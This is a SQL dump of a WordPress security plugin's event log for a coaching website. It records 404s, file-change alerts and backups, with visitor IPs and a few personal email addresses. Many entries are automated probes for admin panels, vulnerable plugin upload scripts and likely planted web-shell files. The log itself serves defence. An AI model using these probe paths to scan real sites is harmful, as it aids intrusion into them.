(85182, 'four_oh_four', '404 Error', 3, '2018-04-21 22:50:40', '2018-04-22 03:50:40', '52.47.168.171', '', 0, '/global-belief-relief/ads.txt', 'http://www.globalbeliefrelief.com/ads.txt', 'a:1:{s:12:"query_string";s:0:"";}'),
(85181, 'four_oh_four', '404 Error', 3, '2018-04-21 22:50:38', '2018-04-22 03:50:38', '52.47.168.171', '', 0, '/global-belief-relief/ads.txt', 'http://globalbeliefrelief.com/ads.txt', 'a:1:{s:12:"query_string";s:0:"";}'),
(85180, 'four_oh_four', '404 Error', 3, '2018-04-21 22:24:37', '2018-04-22 03:24:37', '66.249.69.99', '', 0, '/author/maria/page/12/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85179, 'four_oh_four', '404 Error', 3, '2018-04-21 21:55:04', '2018-04-22 02:55:04', '216.244.66.234', '', 0, '/blog/page/72/zolotoslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85177, 'four_oh_four', '404 Error', 3, '2018-04-21 21:27:04', '2018-04-22 02:27:04', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85178, 'four_oh_four', '404 Error', 3, '2018-04-21 21:54:36', '2018-04-22 02:54:36', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85176, 'four_oh_four', '404 Error', 3, '2018-04-21 21:24:28', '2018-04-22 02:24:28', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85175, 'four_oh_four', '404 Error', 3, '2018-04-21 20:19:39', '2018-04-22 01:19:39', '193.106.30.99', '', 0, '/wp-content/plugins/easyrotator-for-wordpress/up.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85172, 'four_oh_four', '404 Error', 3, '2018-04-21 19:55:32', '2018-04-22 00:55:32', '198.144.187.96', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85173, 'four_oh_four', '404 Error', 3, '2018-04-21 19:58:30', '2018-04-22 00:58:30', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85174, 'four_oh_four', '404 Error', 3, '2018-04-21 20:10:07', '2018-04-22 01:10:07', '186.216.203.12', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85170, 'four_oh_four', '404 Error', 3, '2018-04-21 19:53:22', '2018-04-22 00:53:22', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85171, 'four_oh_four', '404 Error', 3, '2018-04-21 19:55:31', '2018-04-22 00:55:31', '198.144.187.96', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85169, 'four_oh_four', '404 Error', 3, '2018-04-21 19:47:59', '2018-04-22 00:47:59', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85167, 'four_oh_four', '404 Error', 3, '2018-04-21 19:12:29', '2018-04-22 00:12:29', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85168, 'four_oh_four', '404 Error', 3, '2018-04-21 19:27:59', '2018-04-22 00:27:59', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85166, 'four_oh_four', '404 Error', 3, '2018-04-21 19:10:09', '2018-04-22 00:10:09', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85164, 'four_oh_four', '404 Error', 3, '2018-04-21 18:50:03', '2018-04-21 23:50:03', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85165, 'four_oh_four', '404 Error', 3, '2018-04-21 18:57:15', '2018-04-21 23:57:15', '157.55.39.11', '', 0, '/certified-coaches/www.Vital-Ventures.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85163, 'four_oh_four', '404 Error', 3, '2018-04-21 18:34:28', '2018-04-21 23:34:28', '219.131.84.79', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85162, 'four_oh_four', '404 Error', 3, '2018-04-21 18:34:27', '2018-04-21 23:34:27', '219.131.84.79', '', 0, '/not_found', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85161, 'four_oh_four', '404 Error', 3, '2018-04-21 18:08:38', '2018-04-21 23:08:38', '216.244.66.247', '', 0, '/blog/page/72/aztek-avtomat.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85160, 'four_oh_four', '404 Error', 3, '2018-04-21 17:51:56', '2018-04-21 22:51:56', '66.249.69.99', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85159, 'four_oh_four', '404 Error', 3, '2018-04-21 17:08:48', '2018-04-21 22:08:48', '171.247.251.1', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85158, 'four_oh_four', '404 Error', 3, '2018-04-21 17:08:47', '2018-04-21 22:08:47', '171.247.251.1', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85157, 'file_change', 'File Changes Detected', 8, '2018-04-21 16:40:35', '2018-04-21 21:40:35', '', '', 0, '', '', 'a:4:{s:5:"added";a:0:{}s:7:"removed";a:0:{}s:7:"changed";a:1:{s:59:"wp-content/plugins/ready-ecommerce/modules/cache/index.html";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1524281745";}}s:6:"memory";s:4:"39.4";}'),
(85155, 'four_oh_four', '404 Error', 3, '2018-04-21 16:31:57', '2018-04-21 21:31:57', '216.244.66.234', '', 0, '/blog/page/72/marcopoloslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85156, 'four_oh_four', '404 Error', 3, '2018-04-21 16:32:04', '2018-04-21 21:32:04', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86019, 'four_oh_four', '404 Error', 3, '2018-04-27 04:12:06', '2018-04-27 09:12:06', '176.240.165.49', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86020, 'four_oh_four', '404 Error', 3, '2018-04-27 04:12:35', '2018-04-27 09:12:35', '176.240.165.49', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(86021, 'four_oh_four', '404 Error', 3, '2018-04-27 04:12:58', '2018-04-27 09:12:58', '176.240.165.49', '', 0, '/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86022, 'four_oh_four', '404 Error', 3, '2018-04-27 04:13:19', '2018-04-27 09:13:19', '176.240.165.49', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86023, 'four_oh_four', '404 Error', 3, '2018-04-27 04:14:05', '2018-04-27 09:14:05', '176.240.165.49', '', 0, '/admin/login.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86024, 'four_oh_four', '404 Error', 3, '2018-04-27 04:14:40', '2018-04-27 09:14:40', '176.240.165.49', '', 0, '/user/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86025, 'four_oh_four', '404 Error', 3, '2018-04-27 04:14:58', '2018-04-27 09:14:58', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86026, 'four_oh_four', '404 Error', 3, '2018-04-27 04:22:47', '2018-04-27 09:22:47', '176.240.165.49', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86027, 'four_oh_four', '404 Error', 3, '2018-04-27 04:23:08', '2018-04-27 09:23:08', '176.240.165.49', '', 0, '/admin.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86028, 'four_oh_four', '404 Error', 3, '2018-04-27 04:23:38', '2018-04-27 09:23:38', '176.240.165.49', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(86029, 'four_oh_four', '404 Error', 3, '2018-04-27 04:25:40', '2018-04-27 09:25:40', '163.172.197.129', '', 0, '/admin/fckeditor/editor/dialog/fck_about/search.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86030, 'four_oh_four', '404 Error', 3, '2018-04-27 04:26:53', '2018-04-27 09:26:53', '163.172.197.129', '', 0, '/admin/fckeditor/editor/dialog/fck_about/search.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86031, 'four_oh_four', '404 Error', 3, '2018-04-27 05:15:43', '2018-04-27 10:15:43', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86032, 'backup', 'Database Backup Executed', 3, '2018-04-27 05:22:22', '2018-04-27 10:22:22', '', '', 0, '', '', 'a:1:{i:0;a:2:{s:6:"status";s:7:"Success";s:7:"details";s:46:"emailed to backup recipients and saved locally";}}');
INSERT INTO `cyb_itsec_log` (`log_id`, `log_type`, `log_function`, `log_priority`, `log_date`, `log_date_gmt`, `log_host`, `log_username`, `log_user`, `log_url`, `log_referrer`, `log_data`) VALUES
(86033, 'four_oh_four', '404 Error', 3, '2018-04-27 05:40:28', '2018-04-27 10:40:28', '156.204.222.20', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86034, 'four_oh_four', '404 Error', 3, '2018-04-27 05:42:46', '2018-04-27 10:42:46', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86035, 'four_oh_four', '404 Error', 3, '2018-04-27 05:42:47', '2018-04-27 10:42:47', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86036, 'four_oh_four', '404 Error', 3, '2018-04-27 05:42:50', '2018-04-27 10:42:50', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86037, 'four_oh_four', '404 Error', 3, '2018-04-27 05:42:51', '2018-04-27 10:42:51', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86038, 'four_oh_four', '404 Error', 3, '2018-04-27 05:56:30', '2018-04-27 10:56:30', '209.90.225.242', '', 0, '/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.css', 'http://clearyourbeliefs.org/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.css', 'a:1:{s:12:"query_string";s:0:"";}'),
(86039, 'four_oh_four', '404 Error', 3, '2018-04-27 05:56:40', '2018-04-27 10:56:40', '209.90.225.242', '', 0, '/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.css', 'http://clearyourbeliefs.com/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.css', 'a:1:{s:12:"query_string";s:0:"";}'),
(86040, 'four_oh_four', '404 Error', 3, '2018-04-27 06:10:58', '2018-04-27 11:10:58', '46.242.12.9', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86041, 'four_oh_four', '404 Error', 3, '2018-04-27 06:17:08', '2018-04-27 11:17:08', '202.172.25.16', '', 0, '/js/mage/cookies.js', 'clearyourbeliefs.org', 'a:1:{s:12:"query_string";s:0:"";}'),
(86042, 'four_oh_four', '404 Error', 3, '2018-04-27 06:27:51', '2018-04-27 11:27:51', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86043, 'four_oh_four', '404 Error', 3, '2018-04-27 06:45:20', '2018-04-27 11:45:20', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86044, 'four_oh_four', '404 Error', 3, '2018-04-27 06:46:43', '2018-04-27 11:46:43', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86045, 'four_oh_four', '404 Error', 3, '2018-04-27 07:06:56', '2018-04-27 12:06:56', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86046, 'four_oh_four', '404 Error', 3, '2018-04-27 07:07:43', '2018-04-27 12:07:43', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86047, 'four_oh_four', '404 Error', 3, '2018-04-27 07:26:10', '2018-04-27 12:26:10', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86048, 'four_oh_four', '404 Error', 3, '2018-04-27 07:26:11', '2018-04-27 12:26:11', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86049, 'four_oh_four', '404 Error', 3, '2018-04-27 07:26:13', '2018-04-27 12:26:13', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86050, 'four_oh_four', '404 Error', 3, '2018-04-27 07:26:14', '2018-04-27 12:26:14', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86051, 'four_oh_four', '404 Error', 3, '2018-04-27 07:43:43', '2018-04-27 12:43:43', '207.46.13.43', '', 0, '/who-we-are/www.ThrivingBusinessPartners.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86052, 'four_oh_four', '404 Error', 3, '2018-04-27 07:44:38', '2018-04-27 12:44:38', '178.137.87.165', '', 0, '/wp-content/plugins/wp-symposium/server/php/ZMDAkzelELvvhE.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86053, 'four_oh_four', '404 Error', 3, '2018-04-27 07:44:40', '2018-04-27 12:44:40', '178.137.87.165', '', 0, '/wp-content/plugins/wp-symposium/server/php/kzQMfRPRDKovci.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86054, 'four_oh_four', '404 Error', 3, '2018-04-27 07:51:25', '2018-04-27 12:51:25', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86055, 'four_oh_four', '404 Error', 3, '2018-04-27 08:29:39', '2018-04-27 13:29:39', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86056, 'four_oh_four', '404 Error', 3, '2018-04-27 08:29:40', '2018-04-27 13:29:40', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86057, 'four_oh_four', '404 Error', 3, '2018-04-27 08:29:42', '2018-04-27 13:29:42', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86058, 'four_oh_four', '404 Error', 3, '2018-04-27 08:29:43', '2018-04-27 13:29:43', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86059, 'four_oh_four', '404 Error', 3, '2018-04-27 08:29:44', '2018-04-27 13:29:44', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86060, 'four_oh_four', '404 Error', 3, '2018-04-27 08:29:45', '2018-04-27 13:29:45', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86061, 'four_oh_four', '404 Error', 3, '2018-04-27 08:29:48', '2018-04-27 13:29:48', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86062, 'four_oh_four', '404 Error', 3, '2018-04-27 08:29:49', '2018-04-27 13:29:49', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86063, 'four_oh_four', '404 Error', 3, '2018-04-27 08:30:33', '2018-04-27 13:30:33', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86064, 'four_oh_four', '404 Error', 3, '2018-04-27 08:38:05', '2018-04-27 13:38:05', '176.130.226.73', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86065, 'four_oh_four', '404 Error', 3, '2018-04-27 08:42:50', '2018-04-27 13:42:50', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86066, 'four_oh_four', '404 Error', 3, '2018-04-27 08:45:21', '2018-04-27 13:45:21', '176.130.226.73', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86067, 'four_oh_four', '404 Error', 3, '2018-04-27 09:39:13', '2018-04-27 14:39:13', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86068, 'four_oh_four', '404 Error', 3, '2018-04-27 10:04:06', '2018-04-27 15:04:06', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86069, 'four_oh_four', '404 Error', 3, '2018-04-27 10:10:42', '2018-04-27 15:10:42', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86070, 'four_oh_four', '404 Error', 3, '2018-04-27 10:39:34', '2018-04-27 15:39:34', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86071, 'four_oh_four', '404 Error', 3, '2018-04-27 10:51:52', '2018-04-27 15:51:52', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86072, 'four_oh_four', '404 Error', 3, '2018-04-27 11:15:27', '2018-04-27 16:15:27', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86073, 'four_oh_four', '404 Error', 3, '2018-04-27 11:22:46', '2018-04-27 16:22:46', '156.220.19.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86074, 'four_oh_four', '404 Error', 3, '2018-04-27 11:31:23', '2018-04-27 16:31:23', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86075, 'four_oh_four', '404 Error', 3, '2018-04-27 11:38:39', '2018-04-27 16:38:39', '176.240.165.49', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86076, 'four_oh_four', '404 Error', 3, '2018-04-27 11:38:46', '2018-04-27 16:38:46', '157.55.39.102', '', 0, '/certified-coaches/howard@breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86077, 'four_oh_four', '404 Error', 3, '2018-04-27 11:38:59', '2018-04-27 16:38:59', '176.240.165.49', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(86078, 'four_oh_four', '404 Error', 3, '2018-04-27 11:39:13', '2018-04-27 16:39:13', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86079, 'four_oh_four', '404 Error', 3, '2018-04-27 11:39:24', '2018-04-27 16:39:24', '176.240.165.49', '', 0, '/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86080, 'four_oh_four', '404 Error', 3, '2018-04-27 11:39:39', '2018-04-27 16:39:39', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86081, 'four_oh_four', '404 Error', 3, '2018-04-27 11:47:29', '2018-04-27 16:47:29', '176.240.165.49', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86082, 'four_oh_four', '404 Error', 3, '2018-04-27 11:48:40', '2018-04-27 16:48:40', '176.240.165.49', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(86083, 'four_oh_four', '404 Error', 3, '2018-04-27 11:49:13', '2018-04-27 16:49:13', '176.240.165.49', '', 0, '/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86084, 'four_oh_four', '404 Error', 3, '2018-04-27 11:49:44', '2018-04-27 16:49:44', '176.240.165.49', '', 0, '/user/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86085, 'four_oh_four', '404 Error', 3, '2018-04-27 12:00:02', '2018-04-27 17:00:02', '176.240.165.49', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86086, 'four_oh_four', '404 Error', 3, '2018-04-27 12:00:33', '2018-04-27 17:00:33', '176.240.165.49', '', 0, '/admin.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86087, 'four_oh_four', '404 Error', 3, '2018-04-27 12:00:55', '2018-04-27 17:00:55', '176.240.165.49', '', 0, '/admin/login.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86088, 'four_oh_four', '404 Error', 3, '2018-04-27 12:01:20', '2018-04-27 17:01:20', '176.240.165.49', '', 0, '/user/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86089, 'four_oh_four', '404 Error', 3, '2018-04-27 12:09:12', '2018-04-27 17:09:12', '176.240.165.49', '', 0, '/admin.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86090, 'four_oh_four', '404 Error', 3, '2018-04-27 12:09:39', '2018-04-27 17:09:39', '176.240.165.49', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(86091, 'four_oh_four', '404 Error', 3, '2018-04-27 12:10:03', '2018-04-27 17:10:03', '176.240.165.49', '', 0, '/admin/login.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86092, 'four_oh_four', '404 Error', 3, '2018-04-27 12:10:16', '2018-04-27 17:10:16', '176.240.165.49', '', 0, '/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86093, 'four_oh_four', '404 Error', 3, '2018-04-27 12:10:30', '2018-04-27 17:10:30', '176.240.165.49', '', 0, '/user/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86094, 'four_oh_four', '404 Error', 3, '2018-04-27 12:11:00', '2018-04-27 17:11:00', '143.202.155.8', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86095, 'four_oh_four', '404 Error', 3, '2018-04-27 12:11:02', '2018-04-27 17:11:02', '143.202.155.8', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86096, 'four_oh_four', '404 Error', 3, '2018-04-27 12:23:43', '2018-04-27 17:23:43', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86097, 'four_oh_four', '404 Error', 3, '2018-04-27 12:47:34', '2018-04-27 17:47:34', '146.185.223.240', '', 0, '/wp-content/plugins/wp-mobile-detector/cache/db.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86098, 'four_oh_four', '404 Error', 3, '2018-04-27 12:47:36', '2018-04-27 17:47:36', '146.185.223.240', '', 0, '/wp-content/plugins/wp-symposium/server/php/BtvssmRJQdsLzx.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86099, 'four_oh_four', '404 Error', 3, '2018-04-27 12:59:47', '2018-04-27 17:59:47', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86100, 'four_oh_four', '404 Error', 3, '2018-04-27 13:03:40', '2018-04-27 18:03:40', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86101, 'four_oh_four', '404 Error', 3, '2018-04-27 13:17:46', '2018-04-27 18:17:46', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86102, 'four_oh_four', '404 Error', 3, '2018-04-27 13:36:44', '2018-04-27 18:36:44', '176.240.165.49', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(86103, 'four_oh_four', '404 Error', 3, '2018-04-27 13:36:57', '2018-04-27 18:36:57', '176.240.165.49', '', 0, '/admin/login.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86104, 'four_oh_four', '404 Error', 3, '2018-04-27 13:37:28', '2018-04-27 18:37:28', '176.240.165.49', '', 0, '/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86105, 'four_oh_four', '404 Error', 3, '2018-04-27 13:37:39', '2018-04-27 18:37:39', '176.240.165.49', '', 0, '/user/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86106, 'four_oh_four', '404 Error', 3, '2018-04-27 13:58:03', '2018-04-27 18:58:03', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86107, 'four_oh_four', '404 Error', 3, '2018-04-27 14:02:11', '2018-04-27 19:02:11', '109.203.109.210', '', 0, '/wp-content/plugins/simple-ads-manager/js/slider/tmpl.js', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86108, 'four_oh_four', '404 Error', 3, '2018-04-27 14:02:12', '2018-04-27 19:02:12', '109.203.109.210', '', 0, '/wp-content/plugins/wp-mobile-detector/cache/db.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86109, 'four_oh_four', '404 Error', 3, '2018-04-27 14:02:13', '2018-04-27 19:02:13', '109.203.109.210', '', 0, '/wp-content/plugins/formcraft/file-upload/server/php/upload.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86110, 'four_oh_four', '404 Error', 3, '2018-04-27 14:02:17', '2018-04-27 19:02:17', '109.203.109.210', '', 0, '/wp-content/plugins/wp-symposium/server/php/cWtZHfJBkuFcFS.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86111, 'four_oh_four', '404 Error', 3, '2018-04-27 14:06:08', '2018-04-27 19:06:08', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86112, 'four_oh_four', '404 Error', 3, '2018-04-27 14:20:47', '2018-04-27 19:20:47', '167.99.70.237', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86113, 'four_oh_four', '404 Error', 3, '2018-04-27 14:20:49', '2018-04-27 19:20:49', '167.99.70.237', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86114, 'four_oh_four', '404 Error', 3, '2018-04-27 14:33:34', '2018-04-27 19:33:34', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86115, 'four_oh_four', '404 Error', 3, '2018-04-27 15:19:38', '2018-04-27 20:19:38', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86116, 'four_oh_four', '404 Error', 3, '2018-04-27 15:23:10', '2018-04-27 20:23:10', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86117, 'four_oh_four', '404 Error', 3, '2018-04-27 15:39:22', '2018-04-27 20:39:22', '181.121.88.245', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85619, 'file_change', 'File Changes Detected', 8, '2018-04-24 16:42:43', '2018-04-24 21:42:43', '', '', 0, '', '', 'a:4:{s:5:"added";a:0:{}s:7:"removed";a:0:{}s:7:"changed";a:2:{s:59:"wp-content/plugins/ready-ecommerce/modules/cache/index.html";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1524604531";}s:82:"wp-content/plugins/ready-ecommerce/modules/cache/timthumb_cacheLastCleanTime.touch";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1524604531";}}s:6:"memory";s:5:"39.41";}'),
(85620, 'four_oh_four', '404 Error', 3, '2018-04-24 16:52:45', '2018-04-24 21:52:45', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85621, 'four_oh_four', '404 Error', 3, '2018-04-24 16:52:46', '2018-04-24 21:52:46', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85622, 'four_oh_four', '404 Error', 3, '2018-04-24 17:33:28', '2018-04-24 22:33:28', '113.102.17.91', '', 0, '/not_found', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85623, 'four_oh_four', '404 Error', 3, '2018-04-24 17:33:29', '2018-04-24 22:33:29', '113.102.17.91', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85624, 'four_oh_four', '404 Error', 3, '2018-04-24 17:40:47', '2018-04-24 22:40:47', '14.8.65.192', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85625, 'four_oh_four', '404 Error', 3, '2018-04-24 18:05:26', '2018-04-24 23:05:26', '168.0.150.238', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85626, 'four_oh_four', '404 Error', 3, '2018-04-24 18:31:28', '2018-04-24 23:31:28', '157.55.39.18', '', 0, '/global-belief-relief/robots.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
